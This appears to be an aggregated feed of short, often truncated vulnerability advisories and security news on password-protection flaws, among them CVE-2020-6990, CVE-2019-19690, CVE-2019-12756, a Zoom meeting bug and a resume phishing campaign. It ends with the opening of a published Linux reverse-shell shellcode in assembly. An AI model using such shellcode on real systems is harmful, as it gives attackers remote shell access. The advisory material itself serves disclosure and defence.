CVE-2020-6990
Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions; MicroLogix 1100 Controller, all versions; RSLogix 500 Software v12.001 and prior. The cryptographic key utilized to help protect the account password is hard coded into the RSLogix 500 binary file...
The vulnerability of the cryptographic function used to protect passwords, the RSLogix 500 software, and the programmable logic controllers MicroLogix 1100 and MicroLogix 1400, allows unauthorized access to confidential information.
The vulnerability of the cryptographic function used to protect passwords, the RSLogix 500 software, and the MicroLogix 1100 and MicroLogix 1400 programmable logic controllers is related to the use of cryptographic algorithms that contain vulnerabilities. Exploiting this vulnerability could allow...
Zoom Bug Could Have Let Uninvited People Join Private Meetings
If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio,...
CVE-2020-3142
A vulnerability in Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iO...
CVE-2019-3700
The CVE-2019-3700 entry relates to yast2-security not using secure defaults for passwords. Technical details across connected records show insecure defaults used prior to version 4.2.6, with password hashes potentially protected poorly due to DES encryption. The fix stated is that yast2-security ...
CVE-2019-19690
Trend Micro Mobile Security for Android Consumer versions 10.3.1 and below on Android 8.0+ has an issue in which an attacker could bypass the product's App Password Protection feature...
Design/Logic Flaw
Trend Micro Mobile Security for Android Consumer versions 10.3.1 and below on Android 8.0+ has an issue in which an attacker could bypass the product's App Password Protection feature...
CVE-2019-19690
CVE-2019-19690 affects Trend Micro Mobile Security for Android (Consumer) versions 10.3.1 and earlier on Android 8.0+. The vulnerability enables bypass of the product’s App Password Protection feature. Details on root cause, affected files/components, exploit steps, or concrete remediation are no...
Mail.ru: Mail.Ru Top - Website Counter Bruteforcing
counter-specific password at top.mail.ru was not sufficiently protected against bruteforce...
Code injection
ansible-playbook -k and ansible cli tools, all versions 2.8.x before 2.8.4, all 2.7.x before 2.7.13 and all 2.6.x before 2.6.19, prompt passwords by expanding them from templates as they could contain special characters. Passwords should be wrapped to prevent templates trigger and exposing them...
Security Bulletin: IBM MQ Java/JMS application can incorrectly flow password in plain text. (CVE-2017-1337)
Summary: IBM MQ Java/JMS application can incorrectly flow password in plain text when PASSWORDPROTECTION=ALWAYS is set in mqclient.ini. Vulnerability Details: CVEID: CVE-2017-1337. DESCRIPTION: IBM MQ Java/JMS application can incorrectly transmit user credentials in plain text. CVSS Base Score: 5.9...
CVE-2019-12756
Symantec Endpoint Protection (SEP), prior to 14.2 RU2, may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could be bypassed for individuals with local administrator rights...
Design/Logic Flaw
Symantec Endpoint Protection (SEP), prior to 14.2 RU2, may be susceptible to a password protection bypass vulnerability whereby the secondary layer of password protection could be bypassed for individuals with local administrator rights...
CVE-2019-12756
Symantec Endpoint Protection (SEP) clients prior to 14.2 RU2 are susceptible to a local password-protection bypass (CVE-2019-12756). An authenticated local attacker could bypass the second layer of password protection and perform actions with local privileges. Connected advisories also reference ...
Mattress Company Leaks Data Records of 387K Customers
A Wisconsin mattress company leaked the records of 387,000 customers online in a database that lacked password protection, a security researcher has found. The incident once again demonstrates the potential security consequences of failing to take even the simplest security measures to protect...
Employers Beware: Microsoft Word 'Resume' Phish Delivers Malware
Employers who receive an email from someone purporting to be a job applicant, with an attached resume, could fall victim to a difficult-to-detect phishing campaign peddling a remote-access tool used often for espionage. Researchers with Cofense said they have recently spotted emails with maliciou...
Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)
/ ; Title : Linux/x8664 - Reverse Shell /bin/sh with Password configurable 120 bytes ; Date : 2019-08-18 ; Author : Gonçalo Ribeiro @goncalor ; Website : goncalor.com ; SLAE64-ID : 1635 global start %define pass "pass" %define port 0x5c11 ; htons4444 start: jmp realstart password: db pass passlen...